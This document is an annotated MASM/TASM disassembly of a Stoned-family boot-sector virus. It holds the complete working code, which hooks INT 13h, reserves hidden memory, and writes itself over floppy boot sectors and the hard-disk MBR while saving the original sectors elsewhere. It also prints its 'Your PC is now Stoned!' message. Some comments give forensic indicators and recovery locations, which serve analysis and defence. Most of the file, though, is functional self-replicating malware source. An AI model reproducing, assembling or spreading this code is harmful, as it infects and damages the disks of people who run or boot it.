;-----------------------------------------------------------------------------
; Boot-sector image header (16-bit real mode, MASM/TASM syntax; the BIOS loads
; the sector at 0000:7C00).  The far jump lands on the very next instruction at
; 07C0:0005, which normalises CS to 07C0h so that every cs: reference in this
; file addresses the image itself.  The data fields below live at fixed image
; offsets (8, 9, 0Dh, 11h) that loc_8 patches by absolute address
; (ds:[7C09h], ds:[7C0Bh], ds:[7C0Fh]) - they must not be moved.
;-----------------------------------------------------------------------------
        jmp     far ptr loc_2           ; *(07C0:0005) -> the `jmp loc_8` below
        jmp     loc_8                   ; (00A1) boot-time entry, see loc_8
data_27 db      0                       ; image-origin flag: 0 = floppy image,
                                        ; 2 = hard-disk image (set in loc_13)
data_28 dd      0F000EC59h              ; saved original INT 13h vector (offset:segment);
                                        ; loc_8 fills it from 0:4Ch / 0:4Eh, so the value
                                        ; in a sample is whatever the infecting machine had
data_29 dd      9F8000E4h               ; far target 0E4h in the resident copy; loc_8
                                        ; stores the copy's segment in the high word
data_30 dd      07C00h                  ; far target 0000:7C00 - the restored original
                                        ; boot sector, jumped to from loc_12
;-----------------------------------------------------------------------------
; Resident INT 13h (disk service) handler.  By the layout above it starts at
; image offset 15h; loc_8 installs it by storing 15h into 0:4Ch and the
; relocated segment into 0:4Eh.  It acts only on AH=2/3 (read/write sectors)
; for drive 0 (DL=0) and only while the drive-A motor is off; then calls sub_1
; to infect the diskette before chaining to the original vector in data_28.
; In:  caller's INT 13h registers (AH=function, DL=drive)
; Out: all registers passed through unchanged to the original handler
; Detection note: an INT 13h vector whose segment lies in the top 2 KB of
; base memory (see loc_8) is the visible trace of this hook.
;-----------------------------------------------------------------------------
        push    ds
        push    ax
        cmp     ah,2                    ; AH < 2 (reset/status): pass through
        jb      loc_3
        cmp     ah,4                    ; AH >= 4: pass through; only 2 (read) and
        jae     loc_3                   ; 3 (write) continue (unsigned compares)
        or      dl,dl                   ; drive 0 (A:) only
        jnz     loc_3
        xor     ax,ax                   ; DS = 0 to reach the BIOS data area
        mov     ds,ax
        mov     al,byte ptr ds:[43Fh]   ; BDA diskette motor status byte
        test    al,1                    ; bit 0 set: drive-A motor already running ->
        jnz     loc_3                   ; skip, so this fires roughly once per spin-up
        call    sub_1                   ; try to infect the diskette in drive A
loc_3:
        pop     ax
        pop     ds
        jmp     cs:data_28              ; chain to the original INT 13h handler
;-----------------------------------------------------------------------------
; SUBROUTINE sub_1 - infect the diskette in drive 0 (called from the INT 13h
; handler above).  Every disk call is made as `pushf / call cs:data_28`, i.e.
; the original BIOS INT 13h entry is invoked directly, bypassing this hook.
; In:    cs = resident image segment; data_28 = original INT 13h vector
; Out:   nothing.  BX, CX, DX, ES, SI, DI are saved/restored; DS is left as CS
;        (the calling handler restores DS itself).
; Steps: 1. read C0/H0/S1 (the boot sector) into cs:200h, up to 4 attempts,
;           resetting the drive after each failure
;        2. if its first 4 bytes equal the first 4 bytes of this image (cs:0)
;           the diskette is already infected -> return
;        3. write the original boot sector to C0/H1/S3 (it can be recovered
;           from there)
;        4. write this image (cs:0, one sector) over C0/H0/S1
;-----------------------------------------------------------------------------
sub_1   proc    near
        push    bx
        push    cx
        push    dx                      ; save the caller's INT 13h parameters
        push    es
        push    si
        push    di
        mov     si,4                    ; SI = read attempts remaining
loc_4:
        mov     ax,201h                 ; AH=2 read, AL=1 sector
        push    cs
        pop     es                      ; ES:BX = cs:200h, buffer for the boot sector
        mov     bx,200h
        xor     cx,cx
        mov     dx,cx                   ; DH=0 head 0, DL=0 drive A
        inc     cx                      ; CH=0 cylinder 0, CL=1 sector 1
        pushf
        call    cs:data_28              ; emulate `int 13h` through the original vector
        jnc     loc_5                   ; CF clear: read succeeded
        xor     ax,ax                   ; AH=0 reset disk system after a failure
        pushf
        call    cs:data_28
        dec     si
        jnz     loc_4                   ; retry, 4 attempts in total
        jmp     short loc_7             ; give up silently
        nop
loc_5:
        xor     si,si                   ; DS:SI = cs:0 (this image)
        mov     di,200h                 ; DI -> sector just read
        cld
        push    cs
        pop     ds
        lodsw                           ; compare the first two words of both
        cmp     ax,[di]
        jne     loc_6
        lodsw
        cmp     ax,[di+2]
        je      loc_7                   ; identical -> already infected, leave
loc_6:
        mov     ax,301h                 ; AH=3 write, AL=1 sector
        mov     bx,200h                 ; ES:BX = the original boot sector
        mov     cl,3                    ; CL=3 sector 3 (CH still 0)
        mov     dh,1                    ; DH=1 head 1 (DL still 0, drive A)
        pushf                           ; -> original boot sector saved at C0/H1/S3
        call    cs:data_28
        jc      loc_7                   ; save failed: leave the boot sector alone
        mov     ax,301h
        xor     bx,bx                   ; ES:BX = cs:0, this image
        mov     cl,1                    ; sector 1
        xor     dx,dx                   ; head 0, drive A
        pushf                           ; -> image written over the boot sector
        call    cs:data_28
loc_7:
        pop     di
        pop     si
        pop     es                      ; restore the caller's registers
        pop     dx
        pop     cx
        pop     bx
        retn
sub_1   endp
;-----------------------------------------------------------------------------
; loc_8 - boot-time entry (reached via the `jmp loc_8` at image offset 5).
; Sets up a stack, saves the BIOS INT 13h vector into data_28, takes 2 KB off
; the top of conventional memory (0:413h), copies the first 1B8h bytes of this
; image there, points INT 13h at offset 15h of the copy, and continues in the
; copy through data_29 (offset 0E4h = the `mov ax,0` that follows this block).
; Forensic indicators: 0:413h reports 2 KB less than the installed base
; memory; the INT 13h vector segment equals (value of 0:413h) * 64.
;-----------------------------------------------------------------------------
loc_8:
        xor     ax,ax
        mov     ds,ax                   ; DS = 0: interrupt vectors / BIOS data area
        cli
        mov     ss,ax                   ; SS:SP = 0000:7C00, just below this image
        mov     sp,7C00h
        sti
        mov     ax,word ptr ds:[4Ch]    ; INT 13h vector, offset word
        mov     word ptr ds:[7C09h],ax  ; -> data_28 low word (image offset 9)
        mov     ax,word ptr ds:[4Eh]    ; INT 13h vector, segment word
        mov     word ptr ds:[7C0Bh],ax  ; -> data_28 high word (image offset 0Bh)
        mov     ax,word ptr ds:[413h]   ; BDA base memory size in KB
        dec     ax
        dec     ax                      ; reserve 2 KB at the top ...
        mov     word ptr ds:[413h],ax   ; ... and hide them from the OS
        mov     cl,6
        shl     ax,cl                   ; KB -> paragraphs (x64) = segment of that area
        mov     es,ax                   ; ES = destination segment of the resident copy
        mov     word ptr ds:[7C0Fh],ax  ; -> data_29 high word (image offset 0Fh)
        mov     ax,15h
        mov     word ptr ds:[4Ch],ax    ; INT 13h offset := 15h (the handler above)
        mov     word ptr ds:[4Eh],es    ; INT 13h segment := resident copy
        mov     cx,1B8h                 ; copy 1B8h bytes: code and message only, not
        push    cs                      ; the partition-table area
        pop     ds                      ; DS = CS = 07C0h
        xor     si,si
        mov     di,si                   ; 07C0:0000 -> ES:0000
        cld
        rep     movsb
        jmp     cs:data_29              ; far jump into the copy at ES:00E4h
;-----------------------------------------------------------------------------
; Continuation at image offset 0E4h, now running from the resident copy
; (entered through `jmp cs:data_29`).  Restores the original boot sector to
; 0000:7C00, occasionally prints the text at offset 189h, infects the MBR of
; the first hard disk if it is not already infected, then jumps to the
; original boot code via data_30.
; Where the original sector is kept (useful for recovery):
;   floppy image    (data_27 = 0): drive 0,   C0/H1/S3
;   hard-disk image (data_27 = 2): drive 80h, C0/H0/S7
; Note: the hard-disk restore read is not error-checked; only the floppy
; path tests CF.
;-----------------------------------------------------------------------------
        mov     ax,0                    ; AH=0 reset disk system
        int     13h
        xor     ax,ax
        mov     es,ax                   ; ES = 0
        mov     ax,201h                 ; AH=2 read, AL=1 sector
        mov     bx,7C00h                ; into 0000:7C00, where a boot sector belongs
        cmp     cs:data_27,0            ; 0 -> this copy came from a floppy
        je      loc_9
        mov     cx,7                    ; hard-disk image: original MBR is at C0/S7
        mov     dx,80h                  ; H0, first hard disk
        int     13h
        jmp     short loc_12            ; (014E) no message, no re-infection check
        nop
loc_9:
        mov     cx,3                    ; floppy image: original boot sector at C0/S3
        mov     dx,100h                 ; H1, drive A
        int     13h
        jc      loc_12                  ; could not restore it -> boot anyway
        test    byte ptr es:[46Ch],7    ; BDA timer tick count, low 3 bits
        jnz     loc_11                  ; only when they are all 0 (roughly 1 boot in 8):
        mov     si,189h                 ; print the NUL-terminated text at offset 189h
        push    cs
        pop     ds
loc_10:
        lodsb
        or      al,al
        jz      loc_11                  ; NUL terminator reached
        mov     ah,0Eh                  ; INT 10h AH=0Eh teletype output, page 0
        mov     bh,0
        int     10h
        jmp     short loc_10            ; (011D)
loc_11:
        push    cs
        pop     es                      ; ES:BX = cs:200h
        mov     ax,201h                 ; read 1 sector:
        mov     bx,200h
        mov     cl,1                    ; C0/S1 (CH is still 0 here)
        mov     dx,80h                  ; H0, first hard disk -> its MBR
        int     13h
        jc      loc_12                  ; no hard disk / error -> skip infection
        push    cs
        pop     ds
        mov     si,200h                 ; compare the MBR's first two words
        mov     di,0                    ; with this image's (cs:0)
        lodsw
        cmp     ax,[di]
        jne     loc_13
        lodsw
        cmp     ax,[di+2]
        jne     loc_13                  ; differ -> not yet infected
loc_12:
        mov     cs:data_27,0            ; resident copy is flagged "floppy", so the
                                        ; diskettes sub_1 infects carry flag 0
        jmp     cs:data_30              ; far jump to 0000:7C00, the original boot sector
loc_13:
        mov     cs:data_27,2            ; mark this image as a hard-disk image
        mov     ax,301h                 ; AH=3 write, AL=1 sector
        mov     bx,200h                 ; the original MBR ...
        mov     cx,7                    ; ... to C0/S7
        mov     dx,80h                  ; H0, first hard disk
        int     13h
        jc      loc_12                  ; failed -> boot without infecting
        push    cs
        pop     ds
        push    cs
        pop     es
        mov     si,3BEh                 ; partition table of the read MBR (200h+1BEh)
        mov     di,1BEh                 ; -> same offset inside this image
        mov     cx,242h                 ; 242h bytes, far more than the 42h-byte table +
        rep     movsb                   ; signature; the surplus lands in the scratch
                                        ; buffer at 200h-3FFh, outside the sector
                                        ; written below, so it has no effect on disk
        mov     ax,301h
        xor     bx,bx                   ; ES:BX = cs:0, this image
        inc     cl                      ; CX = 1 (rep left it 0): C0/S1; DX still 80h
        int     13h                     ; write the image over the MBR
        jmp     short loc_12
;------------------------------------------------------------------------------------------
; Message text and padding.  This is DATA that the disassembler rendered as
; instructions; no code jumps here.  loc_10 prints it byte by byte from image
; offset 189h up to the first NUL.  The encodings below decode to:
;   07 "Your PC is now Stoned!" 07 0D 0A 0A 00   (BEL, text, BEL, CR, LF, LF, NUL)
; followed by "LEGALISE" and a few non-text bytes the visible code never
; references, then 72 zero bytes.  By the layout, 189h plus these bytes ends at
; exactly 200h, so the zeros occupy 1B8h-1FFh - the region loc_8 does not copy
; and loc_13 later fills with the host's partition table.  The text is
; consistent with the well-known Stoned boot-sector virus family.
;------------------------------------------------------------------------------------------
        pop     es                      ; 07          BEL
        pop     cx                      ; 59          'Y'
        db      6Fh                     ; 6F          'o'
        jnz     $+74h                   ; 75 72       "ur"
        and     [bx+si+43h],dl          ; 20 50 43    " PC"
        and     [bx+di+73h],ch          ; 20 69 73    " is"
        and     [bp+6Fh],ch             ; 20 6E 6F    " no"
        ja      $+22h                   ; 77 20       "w "
        push    bx                      ; 53          'S'
        jz      $+71h                   ; 74 6F       "to"
        db      6Eh                     ; 6E          'n'
        db      65h                     ; 65          'e'
        db      64h                     ; 64          'd'
        and     [bx],ax                 ; 21 07       "!" BEL
        or      ax,0A0Ah                ; 0D 0A 0A    CR LF LF
        add     [si+45h],cl             ; 00 4C 45    NUL terminator, then "LE"
        inc     di                      ; 47          'G'
        inc     cx                      ; 41          'A'
        dec     sp                      ; 4C          'L'
        dec     cx                      ; 49          'I'
        push    bx                      ; 53          'S'
        inc     bp                      ; 45          'E'
        xor     al,[bx+di]              ; 32 01       not text
        add     al,32h                  ; 04 32       not text
        add     word ptr ds:[0B00h][bx+si],ax ; 01 80 00 0B  not text
        add     ax,132h                 ; 05 32 01    not text
        db      72 dup (0)              ; zero fill up to offset 200h (1B8h-1FFh)